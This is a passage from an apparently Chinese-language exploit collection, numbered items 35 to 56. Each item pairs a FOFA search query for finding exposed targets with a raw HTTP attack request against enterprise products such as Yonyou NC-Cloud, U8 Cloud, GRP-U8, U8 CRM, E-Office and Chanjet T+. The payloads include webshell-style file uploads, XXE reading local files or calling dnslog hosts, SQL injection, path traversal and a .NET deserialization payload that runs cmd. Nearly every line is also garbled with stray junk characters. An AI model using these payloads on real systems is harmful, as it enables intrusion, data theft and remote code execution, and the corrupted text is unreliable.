POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1% k/ u$ N$ O3 q6 C
Host: 203.25.218.166:88889 K- u' ^; n( u0 h6 ^7 a: m; c
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
3 W" h4 L: N6 R% D. o) AAccept-Encoding: gzip, deflate, f& F' C/ ]9 e# K" t- d/ }
Accept: */*
! @# y4 n) n/ v/ u9 _; l: E' UConnection: close
$ I8 J G5 |( f' I) f2 O# @accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA" P/ D7 B: n" q) ]7 N
Content-Length: 190/ m! N/ z1 ?/ l' G
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0( Q4 X6 v1 F, P
: o+ [5 g, k# y5 Y
--fd28cb44e829ed1c197ec3bc71748df0& v8 d# A/ B! I! W: l
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"1 P4 @: Y: t$ `) J- l5 d' X7 L4 g
1 l' b8 G5 g0 [* S' v<%out.println(1111*1111);%>
+ f4 U8 t x: W--fd28cb44e829ed1c197ec3bc71748df0--
# L! ^ v5 P0 D$ w! B' I7 z4 |+ V: e; {7 [. f
" T \& _# v; D6 G0 ^! {% V36. 用友NC-Cloud soapFormat XXE( I" \$ E* J0 l/ u% v
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
9 c" y# G+ _# T5 H3 \& @POST /uapws/soapFormat.ajax HTTP/1.1
- a( t- W+ \! l. S( WHost: 192.168.40.130:8989
$ S2 ], U. t4 A5 oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0' O" E2 ^9 |5 a3 k
Content-Length: 263) K. O& }+ v2 b7 u8 j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 D" F Z2 A; R3 @Accept-Encoding: gzip, deflate% U' V& J, E- C I, o: F$ [
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* @3 W7 w/ d' g& \8 S% GConnection: close; H9 i" _: m* p; T+ P3 y0 Q
Content-Type: application/x-www-form-urlencoded' B. |9 L9 }! w1 z& L
Upgrade-Insecure-Requests: 1
# A& h0 D/ s% g" ~( y- p
9 {' U! r5 A, h: M& Umsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
0 Q* f7 r5 @' i7 i- }
( f+ q- ^7 Y3 }8 H% I! ?7 y2 W8 F: \6 e) H$ v! T
37. 用友NC-Cloud IUpdateService XXE+ ?" Z5 l8 o' i' N
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
% N/ j7 Z; c7 H1 HPOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
4 _; `% @+ ?3 @+ b* X7 Q5 ^6 qHost: 192.168.40.130:89891 A7 F4 Y1 z) \& K7 L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
# u. [4 G& d; b' |9 ]" d7 k/ ]0 KContent-Length: 421
7 c% |8 w4 f% U! G/ Q1 pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
0 f5 I. l! M" u% }Accept-Encoding: gzip, deflate `8 @) c6 ^! e, D( d* \$ a
Accept-Language: zh-CN,zh;q=0.9& l+ M& L$ @7 D
Connection: close8 O! @! j; L4 ^/ L. B
Content-Type: text/xml;charset=UTF-8
& w+ E! {) z0 @4 d6 P: ySOAPAction: urn:getResult
3 ]+ S( D H- d. N* M( tUpgrade-Insecure-Requests: 15 A: [3 H5 I; q1 l% f+ w8 D" f
* X- p" h& v+ ~# \6 Y
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">; g$ Q$ ]( g% t/ f! ~
<soapenv:Header/>
2 C [+ E9 _) ~! Z<soapenv:Body>
2 ~0 f4 b( H5 a) U! ~2 Q<iup:getResult>
0 _, u. H/ M+ X<!--type: string-->
; Q5 @8 w7 ?; K9 c<iup:string><![CDATA[2 j( f- o- ?6 C7 _9 F
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>8 Y+ ~9 i" M- i, F7 X
<xxx/>]]></iup:string>5 ]! u8 q; l$ V, L
</iup:getResult>' Y: V+ g* Q( d1 T) J
</soapenv:Body>
1 W' k7 G4 p0 n3 u% u* K0 p</soapenv:Envelope>
! y; v% Q G3 A
- g# Z+ ^5 u' [/ \2 s4 p2 o7 G& Z3 `: u. V% ?- w7 P- ]! l
2 T( E; T1 z% |1 v2 B% _38. 用友U8 Cloud smartweb2.RPC.d XXE. ?" ]2 Z! t/ A
FOFA:app="用友-U8-Cloud"% T# B: d! L% f7 L& t: n8 d
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
8 ]0 e/ K" L3 _- J8 N' k4 xHost: 192.168.40.131:8088
/ ]( Q, w7 ~5 E) _: R' CUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
- F7 b" {+ p$ K$ s3 eContent-Length: 2604 _! M" h3 l$ z" R5 y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
4 D. Z6 H( i: X: p) I& lAccept-Encoding: gzip, deflate
& p* C f8 S% i6 p! {( t3 oAccept-Language: zh-CN,zh;q=0.9
/ v# U" S4 U B- ~Connection: close c2 h2 Z% Z. c9 ~3 ]/ P$ n9 H
Content-Type: application/x-www-form-urlencoded
# C* T3 ]3 G6 {6 `7 n4 G
" [ o/ x' h4 [: q% z5 n__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>- n5 @: B0 v! I( [8 ~
7 _# u7 Y5 E8 M; `- Q$ ?' t: l# C# G& q
39. 用友U8 Cloud RegisterServlet SQL注入
5 Q! Z2 M. ?. A O& y9 yFOFA:title="u8c"
/ Y, k& W% h% s* Z5 J/ f# D8 B% QPOST /servlet/RegisterServlet HTTP/1.1
4 Q: D& L' q# }8 g# h4 |: A. pHost: 192.168.86.128:8089
( u8 W$ f6 G0 S9 P+ I* {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
1 ^' I4 X8 r2 u* K7 e+ XConnection: close4 M* u4 y! m) c1 C0 c" u
Content-Length: 85
, J% s/ g& {* a( s, H: MAccept: */*
- @7 U1 I6 S7 Q. r* MAccept-Language: en0 _/ W' k: k4 ~+ Z/ m6 J4 u i
Content-Type: application/x-www-form-urlencoded
; Z3 a# V5 |/ S/ eX-Forwarded-For: 127.0.0.1) e {6 ?' ~+ {6 @! p) M4 L
Accept-Encoding: gzip! W5 l+ k+ G& R+ ?7 W
2 i& `# Q8 x v/ D" Y
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
' u! p, n0 b0 i! z9 I: u7 s4 K* i& F& k) Z' z- o3 {- m4 w
7 b5 z- p( X: }0 Z, L40. 用友U8-Cloud XChangeServlet XXE) d/ T9 {1 {9 r( y1 m& M
FOFA:app="用友-U8-Cloud"
: U0 @" r; g7 R+ w# q) r4 aPOST /service/XChangeServlet HTTP/1.1# k. M8 j1 Z2 L% W6 {$ {
Host: x.x.x.x
. q5 Y, o! [3 c+ ?; G+ [* p, cUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36& Q m6 W% A& b0 V& v |% Y" F
Content-Type: text/xml
" Q2 a0 ?7 Y3 r2 M* UConnection: close
; P0 ~+ C0 d6 B5 B. }6 e' [
; {/ |! ^7 H9 _) B; e<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
0 z0 w' R' u4 N2 Y+ L. e0 d
' H: }1 I1 W. H' J+ ^$ }4 p" Y' x7 Z+ g1 J8 b- A
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
' }! }, V5 M4 q X7 m7 f! [- iFOFA:app="用友-U8-Cloud"' K) P: a4 |/ y; N9 ]/ H
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
% ]# D' M! o$ a7 c* g; ~Host:0 H1 i. l! ]4 v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" _' [. s0 ]3 D N. |" gContent-Type: application/json! _5 _, I% B$ |! q n D. T
Accept-Encoding: gzip( a6 Y7 h Y% A) n0 l
Connection: close
& a: Q% _! C9 v2 g: y; ^. g
* R8 q+ g* K/ S$ i8 I% n9 l3 |/ S% ?
42. 用友GRP-U8 SmartUpload01 文件上传
: D9 r# G& v& G2 O$ rFOFA:app="用友-GRP-U8"6 ?4 i) H/ i/ u1 E" p
POST /u8qx/SmartUpload01.jsp HTTP/1.1
1 r g* s# ]- w8 d9 @Host: x.x.x.x
1 \/ o: y- [* Q; U$ q1 bContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
2 s9 S; X u; [! p7 FUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
4 O( V. _) ]0 h
9 Z) V2 {' o% R7 W+ r- `PAYLOAD
# p, x3 q' |, w8 \. N; v+ A& v
( y' o1 D' F% C: ^8 G$ |) Z5 ?3 u/ q5 S/ d7 \
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml: A9 d5 ~: y) o7 i* P
, e$ p6 @. X. ^. i
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
: ^ ]* V$ q; P2 j. |& p$ `FOFA:app="用友-GRP-U8"
) K6 Q; S2 {' q! F4 z. ~$ GPOST /services/userInfoWeb HTTP/1.1
# y: y! Y* Q+ v0 p, @$ q& I: tHost: your-ip
/ B; z) z! D9 `, a9 |User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
) T% I; m+ d9 g- I! t3 zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ f8 C! o/ @2 K& z% _Accept-Encoding: gzip, deflate
) T- p8 R% c- N R/ SAccept-Language: zh-CN,zh;q=0.94 T0 {: |1 B3 e& c
Connection: close: k0 Y: ?1 P6 `. s8 w/ I! w
SOAPAction:9 i+ G; N# ]% _5 E/ ^
Content-Type: text/xml;charset=UTF-8
* z, g; r3 T1 h2 S4 ~* i# Z) q1 l* O* m
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
# S0 Q) u8 D1 j# Q2 p. d4 r( w <soapenv:Header/>
" v4 E: V6 r5 b [; F <soapenv:Body>
% P# |7 b( M2 L* F" g" t <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
: H9 ^) R- _* F# \" s& U+ G) D <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
* s$ r1 u) J( |. j7 a4 t </ser:getUserNameById>- Y# B! ?2 {) b1 o2 N
</soapenv:Body>
( Z; e4 X7 q6 v1 H2 ?& z</soapenv:Envelope>
: M7 ]7 f% U& d* O5 U5 X' R2 l- ^# R( b- m; x1 `+ I4 Q9 X4 o
2 M! q7 E8 L) S
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
$ w* N6 f% z$ Y# N cFOFA:app="用友-GRP-U8"
) V3 X( {- @* q; wGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1( Z7 e3 N1 h# }
Host: your-ip
- ^ N$ Y& e4 Y! C* {/ o3 r, uUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.367 q" g- d9 C) V7 i! o3 N% Y. _& ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 y5 T. `7 A; i. m! BAccept-Encoding: gzip, deflate
3 z/ \7 ^3 e AAccept-Language: zh-CN,zh;q=0.9
$ S5 O% n7 U2 Q' bConnection: close1 D& M4 b! k1 s
2 h7 D. k8 y' s8 q" E# }
4 Q! H& @4 |& I' z% ?& T45. 用友GRP-U8 ufgovbank XXE
( `5 ~' A N) d" XFOFA:app="用友-GRP-U8"$ d; H0 j' E2 W- y
POST /ufgovbank HTTP/1.10 m4 J7 m8 r- Q% ?5 p
Host: 192.168.40.130:222/ m7 ]" i6 p& F6 f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
# |9 g$ x x% P }Connection: close; z" b$ i- P& q0 @1 P* E
Content-Length: 161
' w" g& ~0 H3 gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
b/ W; [* k) rAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' q! `* S& Q( W8 D$ Z
Content-Type: application/x-www-form-urlencoded$ D2 f! ?9 u; ]
Accept-Encoding: gzip
5 G8 r8 H6 H8 ^( h% ?7 \4 b0 G# ^$ t0 ^6 E
reqData=<?xml version="1.0"?>' `, d% y) _8 X6 p3 G2 h
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
6 z# w) m( B3 L+ o' J. a5 W5 T/ _5 ~ Z
$ h2 t G( @& O# ~5 R
46. 用友GRP-U8 sqcxIndex.jsp SQL注入5 M1 _- `: c9 y/ q+ F
FOFA:app="用友-GRP-U8"3 V' r1 E5 e! y, X/ o }
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
$ K8 |6 k( A5 d% m3 Y6 D% N8 mHost: your-ip) R4 E; J$ B8 y- y* ~4 X' r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36+ n1 r( z0 M. f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.77 F% R) g# S& |( W* B3 n% n5 j
Accept-Encoding: gzip, deflate
% e! ~( F2 q5 T9 C9 S. O. P& V3 o7 eAccept-Language: zh-CN,zh;q=0.99 s7 Z2 b8 T: s; K
Connection: close/ g/ n' z4 z. u' R1 M8 b
- s* w& d# v+ N0 Z% F" u
& r5 s" z8 I$ l" C47. 用友GRP A++Cloud 政府财务云 任意文件读取) [: [- R8 K" `. `) y
FOFA:body="/pf/portal/login/css/fonts/style.css"
3 V4 `1 O9 C9 i1 pGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.11 z- j" E: X$ X# b7 G1 a
Host: x.x.x.x
) y: v6 P7 |; l! p1 f4 WCache-Control: max-age=0) U9 y' G" z% s: I8 `2 o
Upgrade-Insecure-Requests: 1' C" C! P9 g! P. I! u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
* p! q9 v+ ]" M" J! i; zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* \; ^) k, k5 wAccept-Encoding: gzip, deflate, br* Y9 G& |- [2 g0 i( r
Accept-Language: zh-CN,zh;q=0.9
+ E n' \# Q# wIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT! o$ Y& s9 R% }" \0 M9 k
Connection: close2 l ?+ f6 i! O9 Y* c: W" L
9 i3 H7 ~4 a) m
$ Q$ @2 Y8 S0 G! J
2 X0 \% |+ F6 }48. 用友U8 CRM swfupload 任意文件上传
+ o; t) O! N/ F. t# K0 v$ i, }) O$ nFOFA:title="用友U8CRM"( A3 |! G7 i( _1 D( t/ V+ E
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
: M" j) b: D6 |; E' LHost: your-ip
/ G9 [2 @* O/ I( KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0/ W* H6 j+ @; r, O: S. G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
; f( r2 X( ]6 t ?3 g1 KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 _4 k# B' a& q( FAccept-Encoding: gzip, deflate! e# @7 [6 j5 }+ G/ g! [1 M
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
1 s, Q; y( \# E) B7 ^------269520967239406871642430066855
' @. J `3 N( o+ g$ G0 K% PContent-Disposition: form-data; name="file"; filename="s.php"
& l+ J* \$ ]; {6 }1231
( b) {* f2 U9 u8 z1 uContent-Type: application/octet-stream& s3 z. [" H/ ~' \8 F
------2695209672394068716424300668556 @6 z8 q o7 N6 `: x b
Content-Disposition: form-data; name="upload"' t7 L* |$ q. b6 @
upload3 F0 G' L2 n3 v, G4 [
------269520967239406871642430066855--
! O* Z( P9 A4 s9 H3 G: W/ ^0 i4 Z) v" J
1 X0 @; u. M/ g; N$ Y, t49. 用友U8 CRM系统uploadfile.php接口任意文件上传
0 E+ W+ y; ^0 W; D. d1 x; }FOFA:body="用友U8CRM"
9 @ G9 q" g% A' _$ s7 v7 V0 l- W
2 z9 J) |0 {5 UPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
) h6 X0 k/ z; q5 Z2 wHost: x.x.x.x
7 [( f1 j; _0 x2 ]2 N8 ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
( E( A% _% c* q; P9 @$ F9 wContent-Length: 3293 e; Q" ^& r/ w7 m0 C8 K7 t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* Y. F1 e* O2 f* ~5 DAccept-Encoding: gzip, deflate3 t! v$ E% y8 o) B8 b& d
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ ?; q( V/ c* O& i: p7 i+ V
Connection: close
$ U* E* p+ A4 y8 k0 AContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w4 E% I/ @5 }- J
1 a' ^, x' G+ U1 Y3 f7 B2 `- F-----------------------------vvv3wdayqv3yppdxvn3w
) g: U" h+ l4 P* R4 x* YContent-Disposition: form-data; name="file"; filename="%s.php "9 _ o# x5 y$ b! t% m
Content-Type: application/octet-stream, | e, N/ C" O; R L' y5 J0 m# ^9 s
2 {- e7 n5 h" A5 V/ t: kwersqqmlumloqa
3 c3 S8 v% Q! i7 b: j- R3 O* G, X-----------------------------vvv3wdayqv3yppdxvn3w; g: v) \1 Y5 @
Content-Disposition: form-data; name="upload"
n; H( F( g& }4 M7 l: p
/ _3 U' N5 S( W' K+ |upload2 s- Q; ?" h4 y( W% ^1 r: ~. J
-----------------------------vvv3wdayqv3yppdxvn3w--* X! V7 d; n% c, x+ x
# J- Z/ H1 A' n/ ~+ B
4 ^8 O1 b2 c0 v8 o) E# j4 Thttp://x.x.x.x/tmpfile/updB3CB.tmp.php
0 v# {" d$ t" H; L
6 ]# C% ~9 b1 Q, g/ Q" R6 {50. QDocs Smart School 6.4.1 filterRecords SQL注入
+ v+ U: B& P0 A+ U% c' p3 {1 }FOFA:body="close closebtnmodal"; s( S3 H0 C& u9 D- G. M4 ~
POST /course/filterRecords/ HTTP/1.1# E$ { y; C! V4 J% Q/ G
Host: x.x.x.x
& [0 Q5 t$ O7 Y5 cUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
1 R' D1 G, `4 }6 w7 P7 HConnection: close
; u9 u" e0 b5 b9 }* YContent-Length: 224
& Q" {6 z" P8 {$ X5 E8 sAccept: */*
5 r( x9 j1 }% L5 z$ E0 C. ^ l! a. NAccept-Language: en
6 @* T- b ~4 t4 F, p3 OContent-Type: application/x-www-form-urlencoded
% a! T/ \& U4 nAccept-Encoding: gzip
' p: M* t) v% d4 ^ X3 ~$ F5 b c% ? c/ x0 u, g$ h3 O
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=18 B, B8 P6 U$ s/ b
- a4 a! O# H( u1 b% q
% ?5 c/ V. V$ v9 o; ^- P: I7 ^( }
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入5 V) Q3 }* j+ d! Q/ [
FOFA:app="云时空社会化商业ERP系统"
% {' O% E2 F2 iGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
S7 ~9 Q& U( h. _8 [2 M P; J; @2 nHost: your-ip
! b8 z0 m6 h- LUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
( F, G2 h, j T3 g6 q4 {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
& {8 l. H. p; z/ m3 L' \% }1 JAccept-Encoding: gzip, deflate! C# X% z$ X k# X6 N; v
Accept-Language: zh-CN,zh;q=0.9( r& L; \- ?7 |# U$ h
Connection: close6 e6 J' O) V6 t. @
$ O, @0 B$ G' d/ K% d" P: N& S2 C' N2 h
52. 泛微E-Office json_common.php sql注入$ t, C* \1 v: }# n* W( Y( ?" X
FOFA:app="泛微-EOffice"- p, a. K4 ] L& R% F' w. |$ c
POST /building/json_common.php HTTP/1.1
& c' Q7 z6 e' p/ j! VHost: 192.168.86.128:8097
7 A4 t4 ~5 L c! a1 ^* Z& F, BUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36' U3 P3 d. k; h4 z! g- P; z; c/ `
Connection: close
9 U( D5 ~ n6 q. A) c8 y+ }1 |Content-Length: 87
/ E: @5 `' S( a) F4 u0 w S& b; NAccept: */*( A4 N h' Y0 k: L& e' x
Accept-Language: en
( [7 g$ u5 j3 I1 c, C/ c4 ~Content-Type: application/x-www-form-urlencoded
5 M0 T5 g; F* n' Q/ H9 ?+ \$ LAccept-Encoding: gzip
e; ~: `9 s$ ~! m
( X( p! ]! ]5 _5 }$ e2 ^tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333' }" n5 s# T3 h$ e8 N
* o* v- W' G; Q* N: f1 o: [' {
! `% R: T A: C3 A. m7 j: I; S53. 迪普 DPTech VPN Service 任意文件上传3 x' H* r: \2 S! B/ r
FOFA:app="DPtech-SSLVPN"# {9 Q7 J! R9 C% r
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd8 g2 d- ~2 u8 [
" `0 u+ K7 q: u* P- M
2 Z/ ^3 F$ @" D' ?0 y B54. 畅捷通T+ getstorewarehousebystore 远程代码执行
4 `: W5 `4 z4 B- X2 F8 ]& ~FOFA:app="畅捷通-TPlus"
2 k6 Q: c, [, J4 \第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件( ^+ ?4 A4 e" R8 _
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt". q- c0 |) g4 k1 D& j$ ]
- e9 @4 [4 W, x
3 b- W x1 v5 H. f完整数据包: r- C0 Q) t; L9 h
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1+ U! s) G, @- ~6 R8 D
Host: x.x.x.x1 S2 G" W, s) J' f g3 N
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F/ e, @8 b) ~- n5 N' b, P( o- |
Content-Length: 593
: y; J( j5 ?% `3 p: ]/ q+ {( j# s/ @) M
{
- |5 R1 O0 _* D"storeID":{
+ S# l4 o: v1 g5 ? d) m6 a% O: w "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",, k# k% g# M T& p' T0 L
"MethodName":"Start",
, ?6 I" e$ h* ^ "ObjectInstance":{0 E$ r) O. \1 X' H
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",# T8 p5 ~; T& J) v' W0 C
"StartInfo":{5 ^ j$ ?. y$ f0 d5 C
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",4 ^. I) N9 L! d8 d# y7 w% B, a: M
"FileName":"cmd",
/ k: ~4 ~8 L0 v4 v" i6 T* j "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
, C M% \" Q! H8 C, [0 |' E }
# C1 N& q4 C$ o+ p2 q5 y* ^+ s }: c! C( |/ q- r8 C
}4 r) Y8 Y, i8 L! H6 ]3 Q% I7 M) d
}
0 `; ?3 g) L1 a% J" o* ^! ~3 Z' |
$ m: P( z) N/ e5 C0 X5 x- u! G- _4 C/ {3 T0 D
第二步,访问如下url
* M9 }6 f2 @! p0 h( l2 `! [/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
$ t7 B- \2 |3 F4 D7 H+ x' q- a) k$ ^! ~
- o. Z5 k8 s9 ~0 K
55. 畅捷通T+ getdecallusers信息泄露
) Z4 z/ x+ f) S! KFOFA:app="畅捷通-TPlus"
1 _9 _/ w1 A# ?5 I第一步,通过
8 `: G1 ~, @- d+ I& T D. C/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie7 J6 I0 Z4 x/ h
第二步,利用获取到的Cookie请求. i# V; _5 ]% a- d1 D- `
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
$ X, j6 Q% @3 e( O- V a0 z) U1 N- f$ e+ U5 c: M. j; C$ C( |& n
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
5 E5 v, ?) @/ BFOFA: app="畅捷通-TPlus"
6 L, B; ]- v# l4 s+ \2 E ^POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
' |, U$ U9 E# |0 g+ p6 Z$ nHost: x.x.x.x3 w! K& c- f$ a {3 N+ W( r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
. Z; s" B8 I3 h( F# F, VContent-Type: application/json
, F# Q8 v& q. r6 B6 {
' d; ~ E8 M! Z8 `{
